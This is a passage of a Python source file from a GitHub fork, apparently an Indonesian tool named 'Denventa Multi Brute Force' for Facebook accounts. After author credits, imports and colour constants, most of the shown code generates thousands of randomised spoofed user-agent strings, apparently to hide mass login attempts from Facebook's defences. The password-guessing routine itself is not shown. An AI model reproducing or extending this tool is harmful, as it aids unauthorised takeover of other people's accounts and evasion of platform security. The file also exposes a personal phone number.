forked from ferlyafriliyan/sakera
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathrun.py
1876 lines (1796 loc) · 115 KB
/
run.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
###------[ Denventa Afriliyan Ferly ]------###
# ------ [ Gausah Dioprek Ntar Error ] ------ #
Facebook = 'Facebook.com/Denventa.Xayonara.Team.UnlimitedARMY'
Develpr = 'Denventa Ferly Afriliyan'
Version = '0.7'
Dnventa = 100013275378835
Post_Dev = 1658880191231144
###----------[ AUTHOR & CREATOR ]---------- ###
# ------ [ Gausah Dioprek Ntar Error ] ------ #
Author = 'Dapunta Khurayra X'
Facebook = 'Facebook.com/Dapunta.Khurayra.X'
Instagram = 'Instagram.com/Dapunta.Ratya'
Whatsapp = '082245780524'
YouTube = 'Youtube.com/channel/UCZqnZlJ0jfoWSnXrNEj5JHA'
Denventa = 1827084332
###----------[ IMPORT LIBRARY ]---------- ###
import requests,bs4,sys,os,random,time,re,json,uuid,subprocess,rich,shutil,webbrowser,base64
from random import randint
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup as par
from datetime import date
from datetime import datetime
from rich import print as printer
from rich.panel import Panel
from urllib.parse import quote
###----------[ ANSII COLOR STYLE ]---------- ###
Z = "\x1b[0;90m" # Hitam
M = "\x1b[38;5;196m" # Merah
H = "\x1b[38;5;46m" # Hijau
K = "\x1b[38;5;226m" # Kuning
B = "\x1b[38;5;44m" # Biru
U = "\x1b[0;95m" # Ungu
O = "\x1b[0;96m" # Biru Muda
P = "\x1b[38;5;231m" # Putih
J = "\x1b[38;5;208m" # Jingga
A = "\x1b[38;5;248m" # Abu-Abu
###----------[ RICH COLOR STYLE ]---------- ###
Z2 = "[#000000]" # Hitam
M2 = "[#FF0000]" # Merah
H2 = "[#00FF00]" # Hijau
K2 = "[#FFFF00]" # Kuning
B2 = "[#00C8FF]" # Biru
U2 = "[#AF00FF]" # Ungu
N2 = "[#FF00FF]" # Pink
O2 = "[#00FFFF]" # Biru Muda
P2 = "[#FFFFFF]" # Putih
J2 = "[#FF8F00]" # Jingga
A2 = "[#AAAAAA]" # Abu-Abu
###----------[ USER AGENT ]---------- ###
ua_default = 'Mozilla/5.0 (Linux; Android 3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.66 Mobile Safari/537.36'
ua_samsung = 'Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J700F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/13.0 Chrome/83.0.4103.106 Mobile Safari/537.36'
ua_nokia = 'Mozilla/5.0 (Linux; Android 5.1; iris605 Build/LMY47I; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/95.0.4638.74 Mobile Safari/537.36[FBAN/EMA;FBLC/en_GB;FBAV/286.0.0.5.105;]'
ua_xiaomi = 'Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_oppo = 'Mozilla/5.0 (Linux; Android 5.1.1; A37f) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.105 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_vivo = 'Mozilla/5.0 (Linux; Android 5.1; vivo Y21 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.101 Mobile Safari/537.36'
ua_iphone = 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1'
ua_asus = 'Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]'
ua_lenovo = 'Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A536 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.73 Mobile Safari/537.36'
ua_huawei = 'Mozilla/5.0 (Linux; Android 10; VOG-L29 Build/HUAWEIVOG-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/112.0.5615.47 Mobile Safari/537.36'
ua_windows = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36'
ua_chrome = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3_1) AppleWebKit/537.36 (KHTML, seperti Gecko) Chrome/112.0.0.0 Safari/537.36'
ua_fb = 'Mozilla/5.0 (Linux; Android 8.0.0; RNE-L21 Build/HUAWEIRNE-L21; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/100.0.4896.58 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/360.0.0.30.113;]'
ua_redmi = 'Mozilla/5.0 (Linux; Android 10; Redmi 8A Build/QKQ1.191014.001; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.71 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/376.0.0.12.108;]'
ua_sony = 'Mozilla/5.0 (Linux; Android 11; J9110 Build/55.2.A.4.332; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.22 Mobile Safari/537.36 open_news open_news_u_s/4509'
ua_random = random.choice([ua_default,ua_samsung,ua_nokia,ua_xiaomi,ua_oppo,ua_vivo,ua_iphone,ua_asus,ua_lenovo,ua_huawei,ua_windows,ua_chrome,ua_fb,ua_redmi,ua_sony])
komentar = '\n\nhttps://www.facebook.com/' + str(Post_Dev)
###----------[ TIME ]---------- ###
id_dev = 345 - 340 + 720 - 723
skrng = datetime.now()
tahun = skrng.year
bulan = skrng.month
hari = skrng.day
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
bulan_cek = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
try:
if bulan < 0 or bulan > 12:
exit()
bulan_skrng = bulan - 1
except ValueError:
exit()
Codename = 159357
CoY = ('\r %s[%s•%s] %sDilarang Keras Merecode %s!%s'%(M,P,M,P,M,P))
_bulan_ = bulan_cek[bulan_skrng]
tanggal = ("%s-%s-%s"%(hari,_bulan_,tahun))
###----------[ APPEND ]---------- ###
OK = []
CP = []
gabung_sandi = []
tempel_sandi = []
ugen2 = []
ugent = []
uaku2 = []
usam = []
ugen = []
uakuh = []
usragent = []
sys.stdout.write('\x1b]2; DMBF - Facebook | Denventa Multi Brute Force - Facebook\x07')
###----------[ GENERATE USERAGENT ]---------- ###
for xd in range(10000) :
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='XT1068 Build/LXB22.46-28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e='Mobile Safari/537.36'
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='MotoG3 Build/MPIS24.107-55-2-17; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e='Mobile Safari/537.36'
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='MotoG3 Build/MPIS24.107-55-2-17; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='Moto G (5) Plus Build/NPNS25.137-35-5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='MotoG3 Build/MPIS24.107-55-2-17; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='Moto E (4) Plus Build/NMA26.42-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='MotoG3 Build/MPIS24.107-55-2-17; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='Moto E (4) Plus Build/NMA26.42-56) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='Moto G (5S) Plus Build/NPS26.116-51) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='XT1068 Build/LXB22.46-28) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='moto e5 Build/OPPS27.91-176-11-16) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a='Mozilla/5.0 (Linux; Android'
b=random.randrange(6, 14)
c='SM-A105'
d='AppleWebKit/537.36 (KHTML, like Gecko) Chrome/'
e=str(random.randrange(10, 214))+'.0.'+str(random.randrange(3000, 7000))+'.'+str(random.randrange(10, 275))
f=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
geko=f'{a} {b}; {c}) {d}{e} {f}'
ugen2.append(geko)
a =random.choice(['Mozilla/5.0 (Linux; Android', 'Mozilla/5.0 (Linux; U; Android'])
b= str(random.randrange(1, 14))+'.'+str(random.randrange(0,6))+'.'+str(random.randrange(0, 6))
c='Moto G Play Build/NPIS26.48-43-2) AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/'
d=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
e=random.choice(['Mobile Safari/537.36', 'Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/352.0.0.21.117;]', 'Mobile Safari/537.36 YaApp_Android/9.75 YaSearchBrowser/9.75', 'Mobile Safari/537.36 AlohaBrowser/3.9.3', 'UCBrowser/12.13.4.1214 Mobile Safari/537.36', 'Mobile Safari/537.36 OPX/1.1', 'Mobile Safari/537.36[FBAN/EMA;FBLC/pt_BR;FBAV/269.0.0.8.118;]', 'Mobile Safari/537.36 OPR/53.0.2569.141117', 'Mobile Safari/537.36 PTST/200804.150828', 'Mobile Safari/537.36 Tapatalk/8.1.7', 'Safari/534.30'])
usam=f'{a} {b}; {c}{d} {e}'
ugen.append(usam)
a='Mozilla/5.0 (Linux; Android'
b=random.randrange(1, 14)
c='RMX'
d=str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))
e='AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/'
f=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
g='Mobile Safari/537.36'
uga=f'{a} {b}; {c}{d}) {e}{f} {g}'
ugen.append(uga)
a='Mozilla/5.0 (Linux; Android'
b=random.randrange(1, 14)
c='CPH'
d=str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))
e='AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/'
f=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
g='Mobile Safari/537.36'
uga=f'{a} {b}; {c}{d}) {e}{f} {g}'
ugen.append(uga)
a='Mozilla/5.0 (Linux; Android'
b=random.randrange(1, 14)
c='vivo'
d=str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))+str(random.randrange(1, 9))
e='AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/'
f=str(random.randrange(20, 275))+'.0.'+str(random.randrange(30, 7000))+'.'+str(random.randrange(20, 275))
g='Mobile Safari/537.36'
uga=f'{a} {b}; {c} {d}) {e}{f} {g}'
ugen.append(uga)
for agenku in range(10000):
a='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['Infinix X653C'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko)80.0.4758.60 Version/4.0 Linux/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 XiaoMi/Mint Browser/3.9.3 '
uakuh=f'{a} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
a='Mozilla/5.0 (Linux; Android'
b=random.choice(['8.1.0','9','10','11','12','13'])
c='Nokia_X'
d='AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
e=random.randrange(73,100)
f='0'
g=random.randrange(4200,4900)
h=random.randrange(40,150)
i='Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/300.2.0.58.129;]'
uakuh=f'{a} {b}; {c} {d}{e}.{f}.{g}.{h} {i}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; U; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['ASUS_Z01QD'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, seperti Gecko) Versi/4.0 Chrome/'
h=random.randrange(80,103)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/381.0. 0.29.105;]'
uakuh=f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}'
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; Android'
b=random.choice(['6','7','8','9','10','11','12'])
c=(['S88Plus'])
d=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
e=random.randrange(1, 999)
f=random.choice(['A','B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'])
g='AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/'
h=random.randrange(73,100)
i='0'
j=random.randrange(4200,4900)
k=random.randrange(40,150)
l='Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/396.1.0.28.104;]'
uakuh=(f'{aa} {b}; {c}{d}{e}{f}) {g}{h}.{i}.{j}.{k} {l}')
usragent.append(uakuh)
aa='Mozilla/5.0 (Linux; Android'
b=random.choice(['5.0','6.0','7.0','8.1.0','9','10','11','12'])
c=random.choice(['SM-J610F'])
